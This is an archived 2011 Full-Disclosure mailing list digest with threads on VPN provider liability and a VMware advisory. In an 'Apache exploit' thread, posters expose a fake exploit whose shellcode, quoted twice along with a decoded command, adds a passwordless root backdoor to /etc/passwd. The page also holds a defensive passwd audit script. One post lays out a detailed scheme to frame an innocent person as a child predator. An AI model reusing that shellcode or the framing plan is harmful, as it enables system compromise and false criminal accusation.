 politicians on trial for their [alleged] crimes when their term is up.

 Who are the real terrorist against our [US] democracy?

 Jeff

Good point Jeff, the real question is what does one do to fix it?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam
Good point Jeff, the real question is what does one do to fix it?

http://www.google.com/search?q=related:www.aclu.org

On Wed, Oct 5, 2011 at 12:00 AM, Laurelai laure...@oneechan.org wrote:

 Good point Jeff, the real question is what does one do to fix it?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Laurelai

On 10/4/2011 7:52 PM, adam wrote:
It's frightening how much power judges have, and how poorly they 
are overseen.


Definitely agree there. Some of the civil cases are disgustingly bad, 
due to there being no media attention and no real oversight. The civil 
case mentioned above is a good example, and all of the excessive child 
support orders even further that.


On topic: I haven't read every single reply here, but from what I've 
seen: no one has mentioned the VPN provider being held personally 
responsible. Being that the attacks originated from machines they own, 
if they failed to turn over user information, could it really be that 
difficult to pin the attacks on them and convince a judge that they 
were responsible?



Also a good point.

On the flip side would it be that hard for a malicious person who works 
at a VPN provider to blame it on a customer? I don't think that's what 
has happened in this case, but hypothetically what is to stop a rogue 
employee from abusing the trust that an LE official might have and 
doctoring logs sent to them?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread VeNoMouS
  

I dunno, China offers the USA that kind of support all the time... or so I heard.

On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:


 Wow, I'm extremely impressed with the support that the developer of
this exploit offers. I had been trying to get the exploit to work for
about an hour or so (couldn't get root on the target) and noticed that
the developer of this exploit logged into my machine (using an old
account I must have set up a while ago named w000t). I couldn't believe
it when I saw that he was logging in to fix the problem, I've NEVER
gotten that kind of support even out of paid software. He's been logged
in for a couple of hours now, and I've noticed that he's
downloaded/uploaded quite a bit (probably downloading the log files and
then uploading patches) so I'm just gonna wait it out. I definitely have
a good feeling about this though.
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Valdis . Kletnieks
On Tue, 04 Oct 2011 22:04:40 CDT, adam said:

 Good point Jeff, the real question is what does one do to fix it?
 
 http://www.google.com/search?q=related:www.aclu.org

Amen to that.  They're not perfect, but the ACLU and EFF are probably
among our best bets during these times.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam
That raises a good question: could a good enough defense attorney convey
that point to a judge well enough to get the charges dismissed? Then again,
if they really believed a VPN service would protect them (even while
violating their agreement with said provider) - there's probably at least *
some* evidence on their machine implicating them. In the event that there's
not though, I do wonder how it would play out.

It'd make for a relatively easy set-up, if that were to work the way you
suggested. You could doctor all of the logs to implicate them, and even go
as far as to use the same software/configuration that they use. No matter
how true their "I have no idea what you're talking about" actually is, the
logs plus added evidence could likely be enough.

That entire thing reminds me of something I thought about after watching To
Catch a Predator a couple of times. You'll notice that in most cases, the
predators respond the same way: they play stupid, pretend not to know
what's going on, etc. Imagine if you knew someone in real life that worked
at a pizza delivery place. Now also imagine that you hated said person.

The undercovers on that show are all pretty predictable, and some of the
tactics they use are present in every single bust. Keeping that in mind, and
with enough research, you could easily find one of their undercovers online.
Now imagine starting a dialogue with one of them, pretending to be the
person who works at a pizza place (for sake of simplicity, we'll call him
Mike). Imagine sending pictures of Mike to the undercover, talking about
having sex with her, sending her nude pictures of you or other people, and
so on.

Then wait for one day that you know Mike is working (and that you know the
undercover would be willing to meet). Figuring out the former would be a
simple call to the pizza place: "Hey [name], do you know what time Mike
comes in today?" From there, you could tell the undercover that you'll come
in your pizza delivery car so that no one suspects anything, so that she
recognizes you, whatever - and tell her that you'll bring a pizza (maybe even
go as far as to figure out her favorite kind for added evidence).

During the day, lots of pizza places only have one or two drivers present.
You could sit outside the pizza place and wait for [other driver] to leave
and Mike to arrive (or do something to cause [other driver] not to make it
back to the pizza place, e.g. slashing one of his tires on a fake delivery).
There's lots of different ideas that could be implemented, as long as the
end result is that you can guarantee Mike will be delivering the pizza. At
which point, you call and request a delivery to undercover's house. Mike
shows up there, undercover invites him inside and asks him to sit down - and
at that point, Chris Hansen comes walking out. Even though everything Mike
would say is indeed true, it'd sound like BS if we believed he had been
talking to the undercover for a couple of months. He'd play stupid and
would be charged with felony offenses of trying to entice a child/yada yada.

In that situation, even if he could somehow come up with proof that he was
set up - no one's gonna believe a pervert. It's just something that I've
thought about a lot, and I wonder how many others have as well (and I
especially wonder if anyone has ever attempted it).


On Wed, Oct 5, 2011 at 12:06 AM, Laurelai laure...@oneechan.org wrote:

  On 10/4/2011 7:52 PM, adam wrote:

 Its frightening how much power judges have, and how poorly they
 are overseen.

  Definitely agree there. Some of the civil cases are disgustingly bad, due
 to there being no media attention and no real oversight. The civil case
 mentioned above is a good example, and all of the excessive child support
 orders even further that.

  On topic: I haven't read every single reply here, but from what I've
 seen: no one has mentioned the VPN provider being held personally
 responsible. Being that the attacks originated from machines they own, if
 they failed to turn over user information, could it really be that difficult
 to pin the attacks on them and convince a judge that they were responsible?


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam
Amen to that.  They're not perfect, but the ACLU and EFF are
probably among our best bets during these times.

Agreed. I know the ACLU gets a lot of flak for stepping on people's toes,
but no matter what their *alleged* agenda is - they've done a whole lot of
good that would have otherwise never existed. Same with the EFF. It gives,
even if only a tiny amount, some hope in situations where you'd otherwise be
completely helpless.

On Tue, Oct 4, 2011 at 10:26 PM, valdis.kletni...@vt.edu wrote:

 On Tue, 04 Oct 2011 22:04:40 CDT, adam said:

  Good point Jeff, the real question is what does one do to fix it?
 
  http://www.google.com/search?q=related:www.aclu.org

 Amen to that.  They're not perfect, but the ACLU and EFF are probably
 among our best bets during these times.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread adam
Yeah but the problem with China is that they're TOO dedicated, and all try
to log in at the same time to fix the problem, which ends up causing the
server to go down. It amazes me how big some of their hearts can be though.

On Tue, Oct 4, 2011 at 10:06 PM, VeNoMouS ve...@gen-x.co.nz wrote:

 I dunno, China offers USA that kind of support all the time... or so
 i heard

 On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:

 Wow, I'm extremely impressed with the support that the developer of this
 exploit offers. I had been trying to get the exploit to work for about an
 hour or so (couldn't get root on the target) and noticed that the developer
 of this exploit logged into my machine (using an old account I must have set
 up a while ago named w000t). I couldn't believe it when I saw that he was
 logging in to fix the problem, I've NEVER gotten that kind of support even
 out of paid software. He's been logged in for a couple of hours now, and
 I've noticed that he's downloaded/uploaded quite a bit (probably downloading
 the log files and then uploading patches) so I'm just gonna wait it out. I
 definitely have a good feeling about this though.

 On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 sec...@gmail.com wrote:

 yer it is clearly leet stuff dude...
 i ran it and got like 2000k 2.2.* apache user bots in a night!
 :P
 hehe (joking)
 funny tho.
 xd


  On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote:

   char evil[] =
 \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46
 \x47\x89
 \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e
 \x51\x89
 \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd
 \x80\xe8
 \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d
 \x63\x23
 \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30
 \x30\x74
 \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64
 \x65\x3a
 \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61
 \x73\x68
 \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73
 \x77\x64
 \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43
 \x44\x44
 \x44\x44
 .
 execl("/bin/sh", "sh", "-c", evil, 0);

 .



 /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

 AHUH.



 On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:

 I regularly trawl Pastebin.com to find code - often idiots leave some
 0day and similar there and it is nice to find.

 Well, seeing as I have no test boxes at the moment, can someone check
 this code in a VM? I am not sure if it is legit or not.

 http://pastebin.com/ygByEV2e

 Thanks :)

 ~Darren



1. char evil[] =
 2. \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
\x46\x47\x89
 3. \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
\x5e\x51\x89
 4. \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
\xcd\x80\xe8
 5. \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
\x2d\x63\x23
 6. \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
\x30\x30\x74
 7. \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30
\x64\x65\x3a
 8. \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62
\x61\x73\x68
 9. \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73
\x73\x77\x64
 10. \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43
\x43\x43\x44\x44
 11. \x44\x44;









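The decoded string quoted above shows what the pastebin code really does: it appends a passwordless UID-0 account to /etc/passwd. A defender's first check on a box that ran it is an audit of the passwd file for exactly that shape of entry. The following Python audit is an added example for this archive page, not code from the thread, the pastebin or the exploit; the sample passwd content is constructed and mirrors the w000t line.

```python
"""Audit passwd-format text for backdoor-style accounts.

Added example; not code from the thread or the exploit.  The sample
below is constructed: a normal-looking /etc/passwd plus the line that
the thread's shellcode appends via
    /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
"""
from dataclasses import dataclass
from typing import List

# Constructed sample input (last line is the backdoor entry).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
w000t::0:0:s4fem0de:/root:/bin/bash
"""


@dataclass(frozen=True)
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious property of each passwd entry.

    Checks (the backdoor line trips the first three):
      * uid 0 on any account other than root
      * empty password field (no 'x', '*' or hash)
      * a non-root account whose home directory is /root
      * malformed entry (not exactly 7 colon-separated fields)
    """
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line_no, fields[0],
                                    "malformed entry (%d fields)" % len(fields)))
            continue
        user, passwd, uid, _gid, _gecos, home, _shell = fields
        if not uid.isdigit():
            findings.append(Finding(line_no, user, "non-numeric uid %r" % uid))
            continue
        if int(uid) == 0 and user != "root":
            findings.append(Finding(line_no, user, "uid 0 account other than root"))
        if passwd == "":
            findings.append(Finding(line_no, user, "empty password field"))
        if home == "/root" and user != "root":
            findings.append(Finding(line_no, user, "non-root account with home /root"))
    return findings


def audit_file(path: str = "/etc/passwd") -> List[Finding]:
    """Audit a real passwd file on the host running this script."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```

Run against a live system with `audit_file()`; on a clean host the only UID-0 entry should be root, and every password field should hold `x`, `*` or a hash.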

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
(using an old account I must have set up a while ago named w000t).

err.. but, you ran it didn't you... so why would u need any old account :P
hehe... just... something which i find strange.
I don't see any support would be good here :) lol i bet he does ONLY
patch to stop the thing being re-rooted, as it has become public since
posted onlist ;)
hehe you should really not let him do much, if that's even true, which i
really am doubting... specially since u named this old account... when, also
saying u tried to run it.. which would, exec shellcode... so i guess.. once
cleared up, and if true, i know this is done by MANY smarter hax, and, your
IP if it was ran, prolly also gets emailed somewhere, somehow... or, some
alert made, or maybe, not.. but, if he was so fast to login then i wonder...
but, then, he is only stopping it, from other hackers, not from, other nice
guys :)
xd


On 5 October 2011 14:06, VeNoMouS ve...@gen-x.co.nz wrote:

 I dunno, China offers USA that kind of support all the time... or so
 i heard

 On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:

 Wow, I'm extremely impressed with the support that the developer of this
 exploit offers. I had been trying to get the exploit to work for about an
 hour or so (couldn't get root on the target) and noticed that the developer
 of this exploit logged into my machine (using an old account I must have set
 up a while ago named w000t). I couldn't believe it when I saw that he was
 logging in to fix the problem, I've NEVER gotten that kind of support even
 out of paid software. He's been logged in for a couple of hours now, and
 I've noticed that he's downloaded/uploaded quite a bit (probably downloading
 the log files and then uploading patches) so I'm just gonna wait it out. I
 definitely have a good feeling about this though.

 On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 sec...@gmail.com wrote:

 yer it is clearly leet stuff dude...
 i ran it and got like 2000k 2.2.* apache user bots in a night!
 :P
 hehe (joking)
 funny tho.
 xd


  On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote:

   char evil[] =
 \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46
 \x47\x89
 \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e
 \x51\x89
 \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd
 \x80\xe8
 \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d
 \x63\x23
 \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30
 \x30\x74
 \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64
 \x65\x3a
 \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61
 \x73\x68
 \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73
 \x77\x64
 \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43
 \x44\x44
 \x44\x44
 .
 execl("/bin/sh", "sh", "-c", evil, 0);

 .



 /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

 AHUH.



 On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:

 I regularly trawl Pastebin.com to find code - often idiots leave some
 0day and similar there and it is nice to find.

 Well, seeing as I have no test boxes at the moment, can someone check
 this code in a VM? I am not sure if it is legit or not.

 http://pastebin.com/ygByEV2e

 Thanks :)

 ~Darren



1. char evil[] =
 2. \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
\x46\x47\x89
 3. \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
\x5e\x51\x89
 4. \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
\xcd\x80\xe8
 5. \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
\x2d\x63\x23
 6. \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
\x30\x30\x74
 7. \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30
\x64\x65\x3a
 8. \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62
\x61\x73\x68
 9. \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73
\x73\x77\x64
 10. \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43
\x43\x43\x44\x44
 11. \x44\x44;










Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
I still think press drives many and more takedowns, and bends the arms of
others too.. for sure.
I know of a case here of petty crime, but is relevant ok, the guy had many
many, and big charges of murder, manslaughter, in other states within
Australia, but was asked for his name, in 'vic', which (about 10yrs ago -
pre babybrother to usa), draconian like laws enabled police to yes, put ppl
in jail for this.
So, he took the temporary jail, and monthly, would be brought before the judge,
and asked again every time for the name/address so his infos could be checked.
each time he would return... waiting for laws to change.
eventually, they just had no room, and threw him out with a slap on wrist
fine... then later, they could not do crap about his murder etc, and he is
still free to this day, simply by doing a little bit of that time, and, not
taking the *definite 15+* :P
Smart, and only would happen NON usa, but yes, USA and USA press has TOO
much power in court, although online, I think the press if it gets involved it
is always seen as big, because since when is ITsec involved? only when you
hear of mass fraud... etc... so, any case would become classed as oh must be
fraud or somethin BIG for them to get arrested.. is indeed fact... but,
it does take sometimes the press, or others, to simply expose it.
many cases are, self explanatory but, some cases are really interesting...
although, laws change so much in usa, it is scarier than the other scary bits
;p
cheers,
xd


On 5 October 2011 13:52, adam a...@papsy.net wrote:

 Its frightening how much power judges have, and how poorly they
 are overseen.

 Definitely agree there. Some of the civil cases are disgustingly bad, due
 to there being no media attention and no real oversight. The civil case
 mentioned above is a good example, and all of the excessive child support
 orders even further that.

 On topic: I haven't read every single reply here, but from what I've seen:
 no one has mentioned the VPN provider being held personally responsible.
 Being that the attacks originated from machines they own, if they failed to
 turn over user information, could it really be that difficult to pin the
 attacks on them and convince a judge that they were responsible?

 On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton noloa...@gmail.com wrote:

 On Tue, Oct 4, 2011 at 10:32 PM, adam a...@papsy.net wrote:
 
 http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm
  Did you actually read the link you pasted?
  [...] and criminal penalties may not be imposed on someone who has not
 been
  afforded the protections that the Constitution requires of such criminal
  proceedings [...] protections include the right [..]
  Then take a look at the actual rights being referenced. Most of which
 would
  be violated as a result.
  In response to 0x41 This is ONCE you are actually in front, of the
  judge...remember, it may take some breaking of civil liberty, for this
 to
  happen... 
  No, you're absolutely right. That's the point here. Contempt is attached
 to
  the previous court order, there wouldn't be a new judge/new case for the
  contempt charge alone. All of it is circumstantial anyway, especially
 due to
  how much power judges actually have (in both criminal AND civil
  proceedings).
 Its frightening how much power judges have, and how poorly they are
 overseen. Confer: Judge James Ware, US 9th Circuit Court (this is not
 a local judge in a hillbilly town).

 Jeff





Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
hmm.. yes interesting..

 On the flip side would it be that hard for a malicious person who works at a
 VPN provider to blame it on a customer? I don't think that's what has
 happened in this case, but hypothetically what is to stop a rogue employee
 from abusing the trust that a LE official might have and doctoring logs sent
 to them?

Absolutely nothing :)
This is where, as i was saying... a shell owner/employee, could easily make
any police run in circles simply trying to get a decent tap on something...
this is where it gets cloudy... but, this is what is being questioned on
this thread too...
I guess we have gotten somewhere.
A. Do NOT use VPN and shell services, to commit crime
B. Do NOT commit crimes, in USA, especially those of a large-scale cyber
nature, and
C. I apparently am laurelai and, i like popcorn (both are false)
Cheers!
xd


On 5 October 2011 14:30, adam a...@papsy.net wrote:

 That raises a good question: could a good enough defense attorney convey
 that point to a judge well enough to get the charges dismissed? Then again,
 if they really believed a VPN service would protect them (even while
 violating their agreement with said provider) - there's probably at least
 *some* evidence on their machine implicating them. In the event that
 there's not though, I do wonder how it would play out.

 It'd make for a relatively easy set-up, if that were to work the way you
 suggested. You could doctor all of the logs to implicate them, and even go
 as far as to use the same software/configuration that they use. No matter
 how true their "I have no idea what you're talking about" actually is, the
 logs plus added evidence could likely be enough.

 That entire thing reminds me of something I thought about after watching
 "To Catch a Predator" a couple of times. You'll notice that in most cases,
 the predators respond the same way: they play stupid, pretend not to know
 what's going on, etc. Imagine if you knew someone in real life that worked
 at a pizza delivery place. Now also imagine that you hated said person.

 The undercovers on that show are all pretty predictable, and some of the
 tactics they use are present in every single bust. Keeping that in mind, and
 with enough research, you could easily find one of their undercovers online.
 Now imagine starting a dialogue with one of them, pretending to be the
 person who works at a pizza place (for sake of simplicity, we'll call him
 Mike). Imagine sending pictures of Mike to the undercover, talking about
 having sex with her, sending her nude pictures of you or other people, and
 so on.

 Then wait for one day that you know Mike is working (and that you
 know undercover would be willing to meet). Figuring out the former would be
 a simple call to the pizza place: "Hey [name], do you know what time Mike
 comes in today?" From there, you could tell the undercover that you'll come
 in your pizza delivery car so that no one suspects anything, so that
 she recognizes you, whatever - and tell her that you'll bring a pizza (maybe
 even go as far as to figure out her favorite kind for added evidence).

 During the day, lots of pizza places only have one or two drivers present.
 You could sit outside the pizza place and wait for [other driver] to leave
 and Mike to arrive (or do something to cause [other driver] not to make it
 back to the pizza place, e.g. slashing one of his tires on a fake delivery).
 There's lots of different ideas that could be implemented, as long as the
 end result is that you can guarantee Mike will be delivering the pizza. At
 which point, you call and request a delivery to undercover's house. Mike
 shows up there, undercover invites him inside and asks him to sit down - and
 at that point, Chris Hansen comes walking out. Even though everything Mike
 would say is indeed true, it'd sound like BS if we believed he had been
 talking to the undercover for a couple of months. He'd play stupid and
 would be charged with felony offenses of trying to entice a child/yada yada.

 In that situation, even if he could somehow come up with proof that he was
 set up - no one's gonna believe a pervert. It's just something that I've
 thought about a lot, and I wonder how many others have as well (and I
 especially wonder if anyone has ever attempted it).


 On Wed, Oct 5, 2011 at 12:06 AM, Laurelai laure...@oneechan.org wrote:

  On 10/4/2011 7:52 PM, adam wrote:

 Its frightening how much power judges have, and how poorly they
 are overseen.

  Definitely agree there. Some of the civil cases are disgustingly bad,
 due to there being no media attention and no real oversight. The civil case
 mentioned above is a good example, and all of the excessive child support
 orders even further that.

  On topic: I haven't read every single reply here, but from what I've
 seen: no one has mentioned the VPN provider being held personally
 responsible. Being that the attacks originated from machines they own, if
 they failed to turn over user information, could it 

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
Oh for sure, if it was not for these people really, none of those crimes
which really did annoy us, would have happened.
So, i am all for them. and what their agenda is.
i guess, you just do not abuse things, and expect to be getting away with
it..



On 5 October 2011 14:34, adam a...@papsy.net wrote:

 Amen to that.  They're not perfect, but the ACLU and EFF are
 probably among our best bets during these times.

 Agreed. I know the ACLU gets a lot of flack for stepping on peoples' toes,
 but no matter what their *alleged* agenda is - they've done a whole lot of
 good that would have otherwise never existed. Same with the EFF. It gives,
 even if only a tiny amount, some hope in situations where you'd otherwise be
 completely helpless.

 On Tue, Oct 4, 2011 at 10:26 PM, valdis.kletni...@vt.edu wrote:

 On Tue, 04 Oct 2011 22:04:40 CDT, adam said:

  Good point Jeff, the real question is what does one do to fix it?
 
  http://www.google.com/search?q=related:www.aclu.org

 Amen to that.  They're not perfect, but the ACLU and EFF are probably
 among our best bets during these times.





[Full-disclosure] VMSA-2011-0011 VMware hosted products address remote code execution vulnerability

2011-10-04 Thread VMware Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:   VMSA-2011-0011
Synopsis:  VMware hosted products address remote code execution
   vulnerability
Issue date:2011-10-04
Updated on:2011-10-04 (initial release of advisory)
CVE numbers:   CVE-2011-3868
   
- 

1. Summary

   Hosted product updates address a remote code execution vulnerability
   in the way UDF file systems are handled

2. Relevant releases

   VMware Workstation 7.1.4 and earlier

   VMware Player 3.1.4 and earlier

   VMware Fusion 3.1.2 and earlier


3. Problem Description

 a. UDF file system import remote code execution

A buffer overflow vulnerability is present in the way UDF file
systems are handled. This issue could allow for code execution if a
user installs from a malicious ISO image that was specially crafted
by an attacker.

VMware would like to thank an anonymous contributor working with the
SecuriTeam Secure Disclosure program for reporting this issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-3868 to the issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.  

VMware         Product   Running   Replace with/
Product        Version   on        Apply Patch
=============  ========  ========  ==============
vCenter        any       Windows   not affected

Workstation    8.x       any       not affected
Workstation    7.x       any       7.1.5 or later

Player         3.x       any       3.1.5 or later

AMS            any       any       not affected

Fusion         4.x       Mac OS/X  not affected
Fusion         3.1.x     Mac OS/X  3.1.3 or later

ESXi           any       ESXi      not affected

ESX            any       ESX       not affected

4. Solution

   Please review the patch/release notes for your product and version
   and verify the checksum of your downloaded file.

   VMware Workstation 7.1.5
   
   http://www.vmware.com/go/downloadworkstation   
   Release notes:
   http://downloads.vmware.com/support/ws71/doc/releasenotes_ws715.html

   VMware Workstation for Windows 32-bit and 64-bit with VMware Tools
   md5sum: 40a0a39377a6ba804d5e76e59449d51f
   sha1sum: 25462e18bf9439876c63948415f7ba7b09baa8e6

   VMware Workstation for Linux 32-bit with VMware Tools
   md5sum: 9c9b4d7a749f1baa485f26e6f366c070
   sha1sum: 31033424656b8eaaa814f3e9c3b5b9c5c53b783b

   VMware Workstation for Linux 64-bit with VMware Tools
   md5sum: 482b8b2890f75488addfc31418031864
   sha1sum: b1f73650f70c94249e5add5d9516d0e45c4ae87d

   VMware Player 3.1.5
   ---
   http://www.vmware.com/go/downloadplayer
   Release notes:
   https://www.vmware.com/support/player31/doc/releasenotes_player315.html

   VMware Player for 32-bit and 64-bit Windows
   md5sum: fcc91227963e58efcb63fb791d2fd813
   sha1sum: d39d9da694c22530a7fa701e3ded6cccdc3ea390

   VMware Player for 32-bit Linux
   md5sum: c96867c8093d23065bed7e71e020bb19
   sha1sum: 4156bdfb7f679114671b416d178028fdc4d3beb4

   VMware Player for 64-bit Linux
   md5sum: 1ec954f1baaf6a60e451979b5e88f2d6
   sha1sum: a253a486d6c6848620de200ef1837ced903daa1c

   VMware Fusion 3.1.3
   ---
   http://www.vmware.com/go/downloadfusion
   Release Notes:
   http://downloads.vmware.com/support/fusion3/doc/releasenotes_fusion_313.html

   VMware Fusion for Intel-based Macs
   md5sum: f35ac5c15354723468257d2a48dc4f76
   sha1sum: 3c849a62c45551fddb16eebf298cef7279d622a9
 

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3868

- 
6. Change log

2011-10-04  VMSA-2011-0011
Initial security advisory in conjunction with the release of VMware
Workstation 7.1.5 and Player 3.1.5 on 2011-10-04.

- ---
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories
http://www.vmware.com/security/advisories

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread coderman
On Tue, Oct 4, 2011 at 9:04 PM, xD 0x41 sec...@gmail.com wrote:
 ...
 This is where, as i was saying... a shell owner/employee, could easily make
 any police run in circles simply trying to get a decent tap on something...

yeah, then they just take whole provider, e.g.:

On Sept. 22nd, Microsoft filed for an ex parte temporary restraining
order from the U.S. District Court for the Eastern District of
Virginia against Dominique Alexander Piatti, dotFREE Group SRO and
John Does 1-22. The court granted our request, allowing us to sever
the known connections between the Kelihos botnet and the individual
“zombie computers” under its control. Immediately following the
takedown on Sept. 26th, we served Dominique Alexander Piatti, who was
living and operating his business in the Czech Republic, and dotFREE
Group SRO, with notice of the lawsuit and began discussions with Mr.
Piatti to determine which of his subdomains were being used for
legitimate business, 


short of it is basic =
 be a discerning customer.
- vpn providers that don't log are better than logging for any period
no matter how short.
- vpn providers that are technically competent are better than those
which will expose you through leaks or when cracked.
- vpn providers resistant to jurisdictional and payment processor
pressure are better than those using easily coerced services, third
parties, or vendors.
- no vpn provider is resistant to you being an ass. if you raise big
heat directly and exclusively on a VPN provider you are both stupid
and subject to them cutting your service if not dumping your logs.
this can be said another way: don't be stupid :)


the incompetent and two-faced should be exposed however. i hear
attrition.org likes to keep lists and name names ...
